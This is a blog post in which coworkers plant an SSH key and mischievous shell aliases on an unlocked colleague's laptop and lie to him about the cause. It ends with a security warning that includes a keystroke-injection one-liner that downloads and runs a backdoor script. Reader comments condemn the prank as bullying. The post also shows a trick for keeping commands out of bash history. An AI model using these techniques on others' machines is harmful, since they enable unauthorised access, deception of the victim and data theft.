Our colleague did not care about security and we pranked him

#StandWithUkraine
Today, 20th March 2023, Ukraine is still bravely fighting for democratic values, human rights and peace in whole world. Russians ruthlessly kill all civilians in Ukraine including childs and destroy their cities. We are uniting against Putin’s invasion and violence, in support of the people in Ukraine. You can help by donating to Ukrainian's army.

One of our office colleagues decided that it was fine to leave his laptop logged in and unattended whenever he went to the kitchen.  A few other colleagues and I saw a golden opportunity to make a tech prank. One day we quickly and surreptitiously added an ssh public key to his ~/.ssh/authorized_keys file. From that time on, we were able to find the IP address of his MacBook in our office local network and, using the ssh prompt, make his laptop do just about anything. 

There were probably already a lot of established security pranks we could have used, but we decided to brainstorm some ideas ourselves over private messages.

Here’s the first thing we did:

 nano ~/.bashrc

The space at the beginning ensures that the command will not appear in the bash history.

And then, somewhere in the middle of the file, we added:

alias cd="sleep 2; cd"

Due to our sly coding, over the next month, every time our colleague used the console and changed the directory with a cd command, he was waiting an extra two seconds. He thought that something happened with a filesystem, but he did nothing to investigate further and did not attempt to fix it.

cd sleep prank

Then one day he asked, "Guys, do you know what might have happened with the change dir command on my Mac?" Another colleague claimed that there was a known issue introduced in some previous versions on Mac OS X. During the next couple of weeks, our poor prank victim checked for updates on his OS X every day.

We finally thought that it is time to disclose our plot and explain that the alias was created in some hidden file (which was fake information). We told him he needed to delete it using the rm command.

Of course, before telling him this, we logged in via SSH and added another alias:

alias rm="find /usr & rm"

We then gathered near his laptop and told him to delete our "malicious hidden alias file" by entering:

rm ~/.alias_file

He pressed Enter, and... Thought that rm was removing all his system files:

rm prank

He noticed the /usr/bin/x files and did Ctrl+C to cancel the command and stop the deletion. But the find command was executed in the background because we happened to put an ampersand (&) after it. Thus, it was impossible to cancel the command with Ctrl+C.

Though there is a way to stop such commands - you can press fg Ctrl+C

How dare we? It is immoral!

When you leave your work hardware unlocked in a public place or open-space office, you become subject to various attacks, which might have far worse consequences than the ones our colleague experienced. Actually, his data was not affected at all.

There have been many cases where temporarily-employed staff (cleaners or contracts) have carefully inserted USB Dongles, which had keyboard controller implementation instead of mass storage, and simulated keystrokes:

CTRL + ALT + T wget https://example.com/backdoor.sh && chmod +x backdoor.sh && bash backdoor.sh ENTER exit ENTER

This can be executed within a second, and then the USB dongle can be ejected. No one will notice. The camera in the room will not "see" a cleaner touching the keyboard. This backdoor script can connect to a hacker-owned server and proxy any commands and outputs via ssh. Then they can just clone your cookies and let themselves log in to any website, taking money from you or your company’s account.

The sooner you understand that only you can take care of your security, the lesser the probability you will become a victim.

care about security

#security #prank
7
Bruce Hardy profile picture
Feb 18, 2021
by Bruce Hardy
Did it help you?
Yes !
No

Best related

When I was a cop, we had a case where an TA at a University wanted to teach a lesson to one of his students. The student left a computer unlocked with his account name on. The TA thought it would be a good lesson to write a death threat to the US President from the open computer. Police/Secret Service called. Ended up the TA lost his position.

Yes, I agree. The sooner people understand there are office place bullies and the concept of mob bullying the sooner people can have the courage to report behavior like this to their superiors and confidence action will be taken. Why did you think this was better then having a conversation? Why should someone have to worry an occasionally unlocked computer in a work facility is a big problem and they can't even trust their co-workers to leave it alone? That sort of thing can happen by accident. So, yes, I agree that people need to protect themselves from becoming victims to people like you.

What a toxic workplace this must be. Gas-lighting your colleague and also rendering his laptop unusable "as a joke" is just straight up bullying. There's something wrong with you if you think this is amusing.
@Email Tester You don't need a sudo (root access) to add executable permission to sh file. You can test it by yourself, just create an empty test.sh and run chmod +x test.sh. Also then you can run this file. It can read cookies because they created from the browser process which is executed by your user.
how is it possible to execute this command without sudo access ? "chmod +x backdoor.sh"